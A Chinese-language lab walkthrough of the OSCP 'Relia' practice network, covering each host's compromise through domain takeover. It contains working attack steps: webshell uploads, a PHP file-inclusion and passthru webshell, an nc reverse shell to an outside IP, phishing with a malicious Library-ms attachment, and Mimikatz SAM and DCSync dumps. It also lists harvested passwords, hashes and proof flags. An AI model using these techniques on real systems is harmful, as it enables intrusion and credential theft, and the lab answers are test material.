OSCP-Relia
2023-04-06
23 min read
机器详情
-
192.168.*.249
- 80
- 445
- 3389
- 8000 -
192.168.*.248
- 80
- 445
- 3389 -
192.168.*.247
- WEB02
- 80
- 443
- 445
- 3389
- WEB02
-
192.168.*.246
- 80
- 443
- 2222 -
192.168.*.245
- 21
- 80
- 442
- 2222
- 8000 -
192.168.*.191
- Login.relia.com
- 80
- 445
- 3389
- Login.relia.com
-
192.168.*.189
- MailServer
- 25
- 110
- 587
- MailServer
-
192.168.*.250
- WINPREP
- 445
- 3389
- WINPREP
-
172.16.*.6
- DC02.relia.com
-
172.16.*.7
-
172.16.*.21
-
172.16.*.19
-
172.16.*.15
-
172.16.*.30
-
172.16.*.14
- WK01
-
172.16.*.20
账号密码
Administrator
adrian e3cea06e2de8d54d43b84d4b5bffb5b0
damon i6yuT6tym@
DefaultAccount
Guest
WDAGUtilityAccount
!8@aBRBYdb3!
User : Administrator
Hash NTLM: 56e4633688c0fdd57c610faf9d7ab8df
User : WDAGUtilityAccount
Hash NTLM: 52a45969feae0bed4b015c310b71eec7
User : mark
Hash NTLM: 666949a828be051120b17ccba8aebfbe
User : emma
Hash NTLM: 289953cccf62743ca4d1ed65183bd868
249 RiteCMS GetShell
开放端口
端口扫描
nmap -n -v -sT -A 192.168.135.249
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
8000/tcp open http Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/7.4.30)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods:
|_ Supported Methods: GET POST OPTIONS
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.174.249:8000/dashboard/
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Web目录扫描
8000 端口发现/cms 路径,管理员路径/cms/admin.php
gobuster dir -u http://192.168.214.249:8000/ -w /usr/share/wordlists/dirb/common.txt -q -n -e
gobuster dir -u http://192.168.214.249:8000/cms/ -w /usr/share/wordlists/dirb/common.txt -q -n -e -b 302
弱口令进后台(admin:admin)
判断CMS版本
Exploit-db 搜索历史漏洞发现存在文件上传绕过
- https://www.exploit-db.com/exploits/50614
方法1
生成WebShell并上传获取Shell
weevely generate cxaqhq cx.php
通过PowerShell反弹Shell
GetShell-信息收集
在c:\Users\adrian\Desktop发现local.txt
系统信息
Hostname: LEGACY
ProductName: Windows Server 2022 Standard
EditionID: ServerStandard
ReleaseId: 2009
BuildBranch: fe_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 4/5/2023 8:36:10 PM
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB5017265, KB5012170, KB5017316, KB5016704,
用户信息
c:\Users\adrian\Desktop>net user
net user
User accounts for \\LEGACY
-------------------------------------------------------------------------------
Administrator adrian damon
DefaultAccount Guest WDAGUtilityAccount
The command completed successfully.
c:\Users\adrian\Desktop>
LEGACY\Administrator: Built-in account for administering the computer/domain
|->Groups: Administrators
|->Password: CanChange-NotExpi-Req
LEGACY\adrian
|->Groups: Remote Desktop Users,Users
|->Password: CanChange-NotExpi-Req
LEGACY\damon
|->Groups: Administrators,Users
|->Password: CanChange-NotExpi-Req
获取Local.txt
c:\Users\adrian\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 12DF-ECB8
Directory of c:\Users\adrian\Desktop
04/05/2023 07:24 PM <DIR> .
10/20/2022 01:45 AM <DIR> ..
04/05/2023 07:24 PM 34 local.txt
1 File(s) 34 bytes
2 Dir(s) 10,353,676,288 bytes free
c:\Users\adrian\Desktop>type local.txt
type local.txt
028da52109617b73cbb69307125dfeae
c:\Users\adrian\Desktop>
发现damon也属于管理员组
找的damon 密码
发现Powershell 历史命令,发现damon 密码
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.20348.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\adrian\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 241B
ipconfig
hostname
echo "Let's check if this script works running as damon and password i6yuT6tym@"
echo "Don't forget to clear history once done to remove the password!"
Enter-PSSession -ComputerName LEGACY -Credential $credshutdown /s
获取管理员权限
CME 获取Shell
crackmapexec smb 192.168.213.249 -u damon -p "i6yuT6tym@"
获取proof.txt
PS C:\> type C:\users\damon\Desktop\proof.txt
d7f6e015411c8dbed9c19d25f5e6f1d2
Mimikatz
* Username : adrian
* Domain : LEGACY
* NTLM : e3cea06e2de8d54d43b84d4b5bffb5b0
* SHA1 : 0471c9cb2ae0977d6fa051e6252d272a0e81ca75
获取敏感信息
环境遍历发现存在Git
寻找Git文件路径
因为.开头的文件或文件夹在Windows上属于隐藏文件,所以需要加上/ah 选项
// 常见搜索命令
dir /s /b C:\.git
// 搜索隐藏文件命令
dir /s /b /ah C:\.git
这里需要注意,Powershell搜索不到只能使用cmd搜索,对比结果看下图
发现Git 提交历史记录
发现邮箱密码
Email configuration of the CMS
[email protected]:DPuBT9tGCBrTbR
If something breaks contact [email protected] as he is responsible for the mail server.
Please don't send any office or executable attachments as they get filtered out for security reasons.
CMS的电子邮件配置
[email protected]:DPuBT9tGCBrTbR
如果有什么东西断了联系[email protected] ,因为他负责邮件服务器。
出于安全原因,请不要发送任何office或可执行附件,因为它们会被过滤掉
248 GetShell
后台弱口令
admin:password
文件白名单&文件上传
手动添加白名单
上传WebShell并执行命令
寻找网站绝对路径
c:\transfer\r14_2022\build\DNN\wwwroot\
寻找Sql Server 配置信息
<add name="SiteSqlServer" connectionString="Data Source=.\SQLExpress;Initial Catalog=dnndatabase;User ID=dnnuser;Password=DotNetNukeDatabasePassword!" providerName="System.Data.SqlClient" />
提权
反弹Shell
上传NC 并反弹Shell
或者PowerShell 一句话提权
查看当前权限
c:\temp>whoami & whoami /priv
whoami & whoami /priv
iis apppool\defaultapppool
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
提权成功
使用RasMan.exe提权成功
使用NC反弹Shell获取System权限Shell
cmd.exe /c "c:\windows\temp\RasMan.exe -i -m 1 -c c:\windows\temp\nc.exe 192.168.45.236 1338 -e cmd.exe"
拿下
c:\temp>type C:\users\emma\Desktop\local.txt
type C:\users\emma\Desktop\local.txt
534ca71044d9c546e049d3615a775800
c:\temp>type C:\users\mark\Desktop\proof.txt
type C:\users\mark\Desktop\proof.txt
8b72d547625b9fa4bbe7bbe616bf33f6
发现AppKey
AppKey: !8@aBRBYdb3!
HASH
Administrator:500:aad3b435b51404eeaad3b435b51404ee:56e4633688c0fdd57c610faf9d7ab8df:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:52a45969feae0bed4b015c310b71eec7:::
mark:1000:aad3b435b51404eeaad3b435b51404ee:666949a828be051120b17ccba8aebfbe:::
emma:1001:aad3b435b51404eeaad3b435b51404ee:289953cccf62743ca4d1ed65183bd868:::
Mimikatz 读取HASH
privilege::debug
token::elevate
lsadump::sam
User : Administrator
Hash NTLM: 56e4633688c0fdd57c610faf9d7ab8df
User : WDAGUtilityAccount
Hash NTLM: 52a45969feae0bed4b015c310b71eec7
User : mark
Hash NTLM: 666949a828be051120b17ccba8aebfbe
User : emma
Hash NTLM: 289953cccf62743ca4d1ed65183bd868
247
信息收集
端口扫描
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-23 16:07 CST
Warning: 192.168.221.247 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.221.247
Host is up (0.24s latency).
Not shown: 65387 closed tcp ports (conn-refused), 132 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.10
|_http-title: RELIA - New Hire Information
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.10
|_http-title: RELIA - New Hire Information
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WEB02
| Not valid before: 2023-07-26T16:36:41
|_Not valid after: 2024-01-25T16:36:41
|_ssl-date: 2023-08-23T08:31:49+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WEB02
| NetBIOS_Domain_Name: WEB02
| NetBIOS_Computer_Name: WEB02
| DNS_Domain_Name: WEB02
| DNS_Computer_Name: WEB02
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-23T08:31:39+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
14020/tcp open ftp FileZilla ftpd
|_ftp-bounce: bounce working!
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r-- 1 ftp ftp 237639 Nov 04 2022 umbraco.pdf
14080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-23T08:31:41
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1489.41 seconds
Web扫描
https://192.168.221.247/assets [Size: 346] [--> https://192.168.221.247/assets/]
https://192.168.221.247/css [Size: 343] [--> https://192.168.221.247/css/]
https://192.168.221.247/dashboard [Size: 349] [--> https://192.168.221.247/dashboard/]
https://192.168.221.247/img [Size: 343] [--> https://192.168.221.247/img/]
https://192.168.221.247/js [Size: 342] [--> https://192.168.221.247/js/]
https://192.168.221.247/pdfs [Size: 344] [--> https://192.168.221.247/pdfs/]
FTP 匿名文件下载
获取账号密码
Installing Umbraco 7
• For Umbraco 7 the requirements are
o IIS 7 or higher
• Database, one of the following: SQL CE, SQL Server 2008 or higher or MySQL with support
for case insensitive queries)
• ASP.NET 4.5 or 4.5.1. Full-Trust
• Ability to set file/folder permissions for the user that "owns" the Application Pool
• You can use the user account "mark" (@relia.com) for basic configuration of the Umbraco
instances on IIS servers (pass "OathDeeplyReprieve91").
o Please DO NOT share this password with anyone outside the dev team.
• IIS is configured to only allow access to Umbraco using the server FQDN at the moment.
o e.g. web02.relia.com, not just web02.
Manual installation of Umbraco
1. Download the files from our.umbraco.org/download and unzip them in a folder.
2. Set up web server hosting the folder you chose. Although IIS is a requirement for production
sites, it runs fine for development in IIS Express.
3. Set up file permissions for the folder. For development server it is okey to have full
read/write/modify permissions for the process serving the web page (AppPool or Network
service)
4. If you want to set up Umbraco on Sql Server or Mysql, download and install it. Make a new
database for Umbraco, and remember Connectionstring details, inccluding database name,
user and password
5. Open your site at localhost, and follow the wizard to set up your site with the database.
Install Umbraco with NuGet
1. Check for updates to the Nuget package manager. In Visual Studio: Tools > Extensions and
Updates > Updates > Visual Studio Gallery. Install if availalbe
2. Create a new web application with template "ASP.NET Web Application with an Empty
template" on .NET Framework 4.5.1
3. Open the package manager console and run Install-Package UmbracoCms
4. Press F5 to build and run your new website.
5. Complete the wizard to choose database provider and set up your site.
漏洞利用
配置Hosts
192.168.221.247 web02.relia.com
PowerShell 反弹Shell
- 使用编码的命令可以防止出现特殊字符串
提权
Get Shell
246
WEB 任意文件读取
读取SSH 私钥
爆破SSH 私钥
ssh2john id_ecdsa > id_ecdsa.hash
john id_ecdsa.hash
id_ecdsa:fireball
SSH登陆&提权
ssh -i id_ecdsa [email protected] -p 2222
发现特殊Web服务
PHP代码漏洞
- 文件包含漏洞
<?php
$which_view=$_GET['view'];
if(isset($which_view)) {
include("views/" . $which_view);
} else {
header('Location: /backend/?view=user.inc');
}
?>
发现可疑PHP
PHP代码漏洞
- 命令执行漏洞
<?php echo passthru($_GET["cmd"]); ?>
PHP 本地文件包含
curl -v "http://127.0.0.1:8000/backend/?view=../../../../../../../var/crash/test.php&cmd=id"
GetShell
上传反弹Shell的Php文件
Curl构造并反弹Shell,获取WWW权限
Sudo -l 发现WWW用户可以直接切换Root权限
245
SSH 私钥登陆
Sudo 提权
账号密码
root:$6$hUF5ezihFkozDRs7$AAkBctkoXVYOjhYOLW22EDkdoXXM085da.v9tPQTZlUtNvKNdV.jrZl5M.WbRJyyQyjh//JXUH0hyQVyyhWgj/:19291:0:99999:7:::
offsec:$6$p6n32TS.3/wDw7ax$TNwiUYnzlmx7Q0w59MbhSRjqW37W20OpGs/fCRJ3XiffbBVQuZTwtGeIJglRJg0F0vFKNBT39a57gakRJ2zPw/:19277:0:99999:7:::
lxd:!:19277::::::
miranda:$6$01GOUNyvP1lFg0Id$QoFsKEsD4um4ctVU62MU/KEmQbdj0OSw7gJ6EXVA4YTjTNxvfzQxdhdsyjHUaw4qO0YAwEMoXUXWBdCd3zW4V.:19277:0:99999:7:::
steven:$6$Rj4tu27TLjcnwC2v$wsNuqImPdduB9mXZHpjjEROvTKwWsp2SckcMB.AtcvHyS7tHTCGh.CrUCP0ogsFH9IjG3i2qekcAXRlkmeZOT1:19277:0:99999:7:::
mark:$6$blWxRVRno5YcdGiN$6ekTTBXDvGfaFRSPxZVLhR8tAmFd20RLlXNL5Q8U44gp0Heq7MLmFZrlaHeaX.pFhlJ3lif10E1zsO3W2tdbC/:19277:0:99999:7:::
anita:$6$Fq6VqZ4n0zxZ9Jh8$4gcSpNrlib60CDuGIHpPZVT0g/CeVDV0jR3fkOC7zIEaWEsnkcQfKp8YVCaZdGFvaEsHCuYHbALFn49meC.Rj1:19277:0:99999:7:::
14
使用上面获取对账号密码钓鱼
开启WEB服务
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ./webdav
发送钓鱼邮件
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server 192.168.239.189 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: [email protected]
Password: DPuBT9tGCBrTbR
获取Shell
发现可疑文件
cat C:\Users\jim\Pictures\exec.ps1
Function ExtractValidIPAddress($String){
$IPregex='(?<Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'
If ($String -Match $IPregex) {$Matches.Address}
}
Clear-DnsClientCache
$server = "mail.relia.com"
$port = 110
$enableSSL = $false
$username = "jim"
#$password = "DPuBT9tGCBrTbR"
$password = "Castello1!"
$baseFolder = "C:\attachments"
function saveAttachment
{
Param
(
[System.Net.Mail.Attachment] $attachment,
[string] $outURL
)
New-Item -Path $outURL -ItemType "File" -Force | Out-Null
$outStream = New-Object IO.FileStream $outURL, "Create"
$attachment.contentStream.copyTo( $outStream )
$outStream.close()
}
[Reflection.Assembly]::LoadFile("C:\Users\jim\Pictures\OpenPop.dll")
$pop3Client = New-Object OpenPop.Pop3.Pop3Client
Write-Output $server
$pop3Client.connect( $server, $port, $enableSSL )
$pop3Client.authenticate( $username, $password )
#$pop3Client.authenticate( $username, $password, "UsernameAndPassword" )
$messageCount = $pop3Client.getMessageCount()
for ( $messageIndex = 1; $messageIndex -le $messageCount; $messageIndex++ )
{
#$uid = $pop3Client.getMessageUid( $messageIndex )
#$incomingMessage = $pop3Client.getMessage( $messageIndex )
$incomingMessage = $pop3Client.getMessage( $messageIndex ).toMailMessage()
foreach ( $attachment in $incomingMessage.attachments )
{
# do something with attachments, tbd - .lnk - .doc word I guess?
if ($attachment.name -like "*.Library-ms*")
{
$filename = $attachment.name
$attachmentURL = Join-Path -Path $baseFolder -ChildPath $filename
saveAttachment $attachment $attachmentURL
}
}
}
$pop3Client.DeleteAllMessages()
if ( $pop3Client.connected )
{
$pop3Client.disconnect()
}
$pop3Client.dispose()
Get-ChildItem 'C:\attachments\*.Library-ms' | ForEach-Object {
$url = Get-Content $_ | Select-String '<url>'
$ip = ExtractValidIPAddress $url
$share = "\\$ip\DavWWWRoot\"
net use H: $share
Get-ChildItem "$share\*.lnk" | ForEach-Object {
copy $_.FullName C:\Windows\Tasks\temp.lnk
net use H: /delete
Unblock-File -Path C:\Windows\Tasks\temp.lnk
powershell -c invoke-item C:\Windows\Tasks\temp.lnk
Get-ChildItem -Path C:\attachments | Where-Object Extension -in ('.Library-ms') | foreach { $_.Delete()}
Remove-Item -Force C:\Windows\Tasks\temp.lnk
}
}
Clear-RecycleBin -Force
发现Kdbx 文件
解密成功
Keepass2 数据库解密
Lazagne 密码抓取
获取 local.txt proof.txt
191
RDP 登陆
xfreerdp /v:192.168.242.191:3389 /u:dmzadmin /p:SlimGodhoodMope
域渗透
信息收集
域管
域管
net group "domain admins" /domain
Administrator dan internaladmin
域控
域用户列表
net user /domain
Administrator andrea anna
brad dan Guest
iis_service internaladmin jenny
jim krbtgt larry
maildmz michelle milana
mountuser
Shell 脚本批量使用smbclient 探测文件共享
for i in {6,7,21,19,15,30,14,20}; do proxychains4 smbclient -L //172.16.86.${i} -U relia.com/jim%Castello1!; done
发现 6、21 机器存在可疑共享,进去查看文件,在21上发现Powershell 脚本历史记录,从中找到密码
**********************
Windows PowerShell transcript start
Start time: 20221019132304
Username: FILES\Administrator
RunAs User: FILES\Administrator
Configuration Name:
Machine: FILES (Microsoft Windows NT 10.0.20348.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 5936
PSVersion: 5.1.20348.859
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.20348.859
BuildVersion: 10.0.20348.859
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Transcript started, output file is C:\Users\Administrator\Documents\PowerShell_transcript.FILES.9_DjDa0f.20221019132304.txt
PS C:\Users\Administrator> $spass = ConvertTo-SecureString "vau!XCKjNQBv2$" -AsPlaintext -Force
PS C:\Users\Administrator> $cred = New-Object System.Management.Automation.PSCredential("RELIA\Administrator", $spass)
PS C:\Users\Administrator> Enter-PSSession -ComputerName INTRANET -Credential $cred
Enter-PSSession : Connecting to remote server INTRANET failed with the following error message : WinRM cannot complete
the operation. Verify that the specified computer name is valid, that the computer is accessible over the network, and
that a firewall exception for the WinRM service is enabled and allows access from this computer. By default, the WinRM
firewall exception for public profiles limits access to remote computers within the same local subnet. For more
information, see the about_Remote_Troubleshooting Help topic.
拿下域控
Dcsync
PS C:\> ./m.exe privilege::debug log "lsadump::dcsync /domain:relia.com /all /csv" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # lsadump::dcsync /domain:relia.com /all /csv
[DC] 'relia.com' will be the domain
[DC] 'DC02.relia.com' will be the DC server
[DC] Exporting domain 'relia.com'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt b896b5f9c769cd04d97008292674c1a5 514
1110 larry 47995d3e82d8e698f9b1a9d78c90aa7e 66048
1113 brad 970ba7d4c92f712d0363706d6144c058 66048
1123 dan 4b22394fc907bd7a74d1af6cc9aca348 66048
1103 maildmz ddbe308ff30d828d484098d1c75c6166 66048
1114 anna f79bec80e693e632f973d32b3489af18 66048
1105 michelle 18d4098c8d9ff721745b388ad4a442bf 4260352
1107 mountuser 6a2f774420368de1567dea28ab0d3988 66048
1108 iis_service bb4136aaa06fe1688b300e2f9243e85b 66048
1111 jenny 5ef6ddc308ac24d5423c0b983eee159c 66048
1106 andrea ce3f12443651168b3793f5fbcccff9db 66048
1109 internaladmin 65a883e27cc4714738dfe4dce95001db 66048
1000 DC02$ 0be5ec2a3dfc501a679203e07e696be8 532480
500 Administrator 60446f9e333abfda8c548cbe11daedc2 66048
1127 WEBBY$ 2e746058eb8dd09d4bc4727a5e951cc2 4096
1122 WK02$ d7f8ba03df0319602fcaa9f4159cc737 4096
1121 WK01$ a910a876d959c52936084752c5575d49 4096
1104 jim be5cb823ee026304b6ed0cd356e34a3c 66048
1124 milana 2237ff5905ec2fd9ebbdfa3a14d1b2b6 66048
1126 FILES$ 955f885b0087a2c5eb44447a4dbd2f12 4096
1119 MAIL$ c5cf3b2b8a7bde67599a1784de8744aa 4096
1125 INTRANET$ 8514c03ee48c29a13fcc44d2ee4865a2 4096
1120 LOGIN$ 6a6ad6f37911df51165fae90cddb51c9 4096
mimikatz(commandline) # exit
Bye!
6、7、21、15、189拿下
6
PS C:\> cat C:\users\Administrator\Desktop\proof.txt
1740a52a921adc025502c7a03d70bf22
7
PS C:\> cat C:\users\michelle\Desktop\local.txt
d6caa6622087693633976bbc496e32f1
PS C:\> cat C:\users\Administrator\Desktop\proof.txt
acdf6d94c4c7b6ebd9a1cb8a4b650b10
本地账号HASH
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b4547a5116dd13e6e206d1286a06b28:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9756266d27a75c923beb3c8c654b31d4:::
21
PS C:\> cat C:\users\Administrator\Desktop\proof.txt
ed42ff3c31f5f4fcb81ac8a17fd9e361
15
PS C:\> cat C:\users\andrea\Desktop\local.txt
b76ae7f51a98090f84329cc27874001c
PS C:\> cat C:\users\milana\Desktop\proof.txt
960f03e8c4a32173463e50d9153bb283
本地账号HASH
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:030b83437fa120c80e8d06967d8fad82:::
offsec:1001:aad3b435b51404eeaad3b435b51404ee:cf998001c44803b490a46f363a2ca812:::
30 Mongodb
PS C:\> cat C:\users\Administrator\Desktop\proof.txt
c43ba8370e020531c0d6c2677b434884
本地账号HASH
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c6290d630dfc5e4ebce170090be7e0cf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e0ace20a027ab482a0e0c42ce61fd2d4:::
14
PS C:\> PS C:\> cat C:\users\offsec\Desktop\proof.txt
a11b1db8140dac6a7f004bef27445dae
PS C:\> cat C:\users\jim\Desktop\local.txt
ce46a4a60d973bb0cedbb1f679a3f777
文件:
C:\Users\jim\Documents\Database.kdbx
本地账号HASH
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d8aa69abd669a0d0ffe02ae095a4e301:::
offsec:1001:aad3b435b51404eeaad3b435b51404ee:a6e162b0429f0ff6cee42809a01fd49d:::
189
PS C:\> cmd.exe /c "dir /s/b c:\proof.txt"
c:\Documents and Settings\Administrator\Desktop\proof.txt
c:\Users\Administrator\Desktop\proof.txt
PS C:\> type c:\Users\Administrator\Desktop\proof.txt
7abc53251d6238edafc4a47c366a9f84
还剩2台:19、20
解密15机器上的Keepass数据库,发现敏感信息
sarah@backup:~$ cat local.txt
63859027bec34e61664daac1a21fa992
20
$ cat /root/proof.txt
4385803a3643c96fa1da5a9df6930328
$ cat /home/andrew/local.txt
192d05d2dd9012544efcd9688863e030